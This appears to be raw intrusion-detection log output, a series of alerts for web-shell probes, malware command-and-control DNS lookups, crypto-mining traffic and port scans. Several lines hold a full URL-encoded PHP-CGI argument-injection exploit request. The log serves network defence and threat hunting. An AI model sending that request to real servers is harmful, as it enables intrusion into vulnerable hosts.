    '"2021-01-11 02:29:19.695000" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.695002" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.694990" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.892051" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.892053" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:19.892040" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:20.088410" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:20.088414" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:20.088406" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP HTTP "2.200.97.15(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:29:23.633677" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:23.633668" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:23.633675" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:29.626275" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:29.626274" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:29.626268" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:30.409788" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:30.409789" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:30.409780" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:30.604812" r2d2 125.26.202.91 58108 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:29:30.943980" r2d2 10.43.192.103 57647 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:43.015963" r2d2 10.43.192.103 57649 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:49.059165" r2d2 10.43.192.103 57650 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:29:59.608226" r2d2 2.200.110.232 63390 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:29:59.610490" r2d2 2.200.107.146 59765 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:30:01.145031" r2d2 10.43.192.103 57652 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:30:17.613900" r2d2 2.200.110.232 64122 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:30:17.650499" r2d2 2.200.110.233 64875 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 02:30:19.267628" r2d2 10.43.192.103 57655 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:30:19.724492" r2d2 2.200.110.232 49415 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:30:21.383989" r2d2 2.200.110.232 64956 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:30:21.386082" r2d2 2.200.107.146 37232 194.0.11.104 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:30:26.306135" r2d2 149.129.50.37 56426 2.200.107.171 80 TCP HTTP http://www.proxylists.net/(proxyjudge.php) "potential proxy probe (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:30:31.339944" r2d2 10.43.192.103 57660 213.252.245.157 452 TCP IPORT 213.252.245.157:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:30:42.421526" r2d2 202.134.159.238 49842 2.200.110.211 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:31:02.590827" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:02.590825" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:02.590820" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:13.135022" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:13.135016" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:13.135024" r2d2 125.26.202.91 21319 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:29.746361" r2d2 2.200.110.232 49212 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:31:29.777870" r2d2 2.200.110.233 65466 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:31:30.979345" r2d2 125.26.202.91 27169 2.200.97.15 80 TCP URL (2.200.97.15)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:31.781487" r2d2 125.26.202.91 27169 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:36.805797" r2d2 125.26.202.91 27169 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:43.381339" r2d2 2.200.110.232 64030 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:31:46.804290" r2d2 2.200.110.232 64321 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:31:46.805760" r2d2 2.200.107.146 10595 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:31:46.858499" r2d2 2.200.110.233 64881 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 02:31:49.430839" r2d2 125.26.202.91 32927 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:31:49.635870" r2d2 125.26.202.91 32927 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:32:26.737033" r2d2 125.26.202.91 45640 2.200.97.15 80 TCP URL (2.200.97.15)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:32:32.763313" r2d2 10.3.160.42 26035 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:32.860386" r2d2 10.3.160.42 26035 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:32.960394" r2d2 10.3.160.42 26035 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:33.165602" r2d2 10.3.160.42 26035 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:33.860653" r2d2 10.3.160.42 26035 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:34.725024" r2d2 2.200.105.226 60017 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 02:32:30.876718" r2d2 122.232.192.170 60449 2.200.107.167 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:36.100195" r2d2 125.26.202.91 45640 2.200.97.15 80 TCP URL (2.200.97.15)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:32:39.778207" r2d2 2.200.110.232 65174 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:32:39.779654" r2d2 2.200.107.146 64766 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:32:45.236708" r2d2 2.200.97.1 53191 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:32:42.520132" r2d2 10.1.19.42 59461 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:52.419696" r2d2 178.17.174.14 49992 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; BTRS99921; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:52.419759" r2d2 178.17.174.14 49992 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; BTRS99921; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:59.613507" r2d2 2.200.107.146 23872 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:32:59.611626" r2d2 2.200.110.232 64166 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:32:52.419748" r2d2 178.17.174.14 49992 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; FunWebProducts; BTRS99921; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:58.463453" r2d2 178.17.174.14 51972 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbLMW2/5.15.1.22229\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:58.463451" r2d2 178.17.174.14 51972 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbLMW2/5.15.1.22229\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:32:58.463454" r2d2 178.17.174.14 51972 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbLMW2/5.15.1.22229\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:33:12.113197" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:12.113148" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:12.113202" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:16.233470" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:16.233464" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:16.233471" r2d2 125.26.202.91 58924 2.200.97.15 80 TCP URL (2.200.97.15)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 02:33:32.000059" r2d2 2.200.108.59 25566,25568,25574,25580,25581,25582,25584,32808,33132,33430,33432,33602,33908,34502,35054,35718,35874,36244,36488,36568,36738,37460,37730,37856,38544,39174,39212,39218,39496,39530,39560,39664,39708,40026,40468,40472,40933,40936,40937,40938,40939,41032,41760,42506,42922,42994,43022,43128,43172,43456,44392,44544,45070,45142,45340,45886,46198,46292,46988,47067,47068,47071,47073,47074,47780,47866,48010,48030,49266,49402,50204,50564,50588,50798,50846,51510,51722,51860,52908,53376,53444,53666,53874,53956,54396,56940,56948,56950,57126,57262,57854,57984,58058,58370,58632,58710,59056,60414,60586 77.53.81.105 21,5257,6453,7417,8152,9167,9398,9666,10074,10161,11297,12060,12602,13171,15199,17446,17533,18257,18343,19294,19493,19700,20319,21048,22950,24899,25288,25545,26641,30658,30782,31260,31522,31941,32113,32279,34499,35424,36577,37533,38221,38483,38501,38662,40183,40428,40511,40625,41169,41639,41882,42135,42692,43894,44067,44104,44431,44713,44835,46785,48405,48433,48836,48951,49303,50572,50710,51354,51502,52106,52119,54322,55091,56125,56306,56313,58183,58212,61153,62802,62814,63675,65434 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:33:32.000056" r2d2 2.200.108.59 25564,25565,25570,25571,25572,25573,25576,25577,25579,25582,25583,25584,32808,32870,32898,33430,33432,33458,33908,34000,34088,34364,34436,34858,35180,35604,35718,36496,36568,37152,37730,37856,37882,38144,39304,39434,39708,39838,40086,40414,40424,40933,40934,40936,40939,41032,41868,43456,43482,44392,44630,45080,45886,46702,47034,47072,47588,48086,49636,50204,50400,50564,50798,50846,51470,51608,51860,51934,52120,52730,52932,53444,53728,53956,54396,56012,56418,56544,56918,56940,56948,57262,57556,57772,58014,58058,58370,58930,59676,59968,60270 77.53.81.105 21,5257,9666,10816,10939,13243,14565,14753,15199,15656,16500,17446,17685,17790,18343,21925,22950,24455,24927,25064,25288,25875,26402,27067,29367,31085,31522,32113,34788,36266,36577,36944,37533,38155,38662,40271,41169,41639,41882,42097,42135,42300,43227,44431,44713,44883,45616,46560,47824,48405,48433,48789,48819,48836,49732,50337,50865,51309,51502,52964,54322,54566,54682,55766,55888,56866,59127,59381,61153,61827,62802,63458,63675,63756,64959 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:33:32.000064" r2d2 2.200.108.59 25565,25566,25567,25568,25569,25571,25573,25574,25575,25578,25579,25581,32898,33132,33458,33738,34364,34436,34502,35336,35562,35874,36496,36574,36738,37018,37130,37152,37460,37928,38158,38182,38934,39304,39496,39560,40026,40472,40932,40934,40935,41868,41930,41934,43172,43482,44630,45080,45340,45434,46026,46292,46988,47068,47069,47070,47071,47073,47074,47912,48010,50400,50588,51470,51510,51530,51608,52120,52604,53376,55008,56012,56418,56544,56950,57126,57556,57772,57854,58014,58096,59350,60586 77.53.81.105 21,6112,7417,9167,9398,10161,10626,10939,14565,16880,17685,17790,18561,18902,19493,19700,20623,21925,22422,24455,24899,25064,25875,26250,29367,34295,34499,35099,36266,36593,37222,38221,40183,40511,40557,42300,43227,44067,44883,45181,48819,49303,50710,50865,51309,51498,52106,54045,54566,55683,55766,56125,56306,56313,56866,58183,58468,59381,61827,62603,62814,64223,65434 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 02:33:43.400038" r2d2 2.200.110.232 64755 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:33:49.822240" r2d2 2.200.110.233 65510 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 02:34:35.006265" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:35.102206" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:35.304120" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:35.604396" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:36.002614" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:36.508335" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:37.102231" r2d2 10.3.160.42 23377 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 02:34:29.732622" r2d2 10.1.19.42 59462 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:34:43.384096" r2d2 2.200.110.232 65364 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:34:43.386743" r2d2 2.200.107.146 58676 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 02:34:53.442789" r2d2 178.17.174.14 33094 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 1.1.4322; FunWebProducts; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 02:34:57.732060" r2d2 2.200.110.232 65198 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
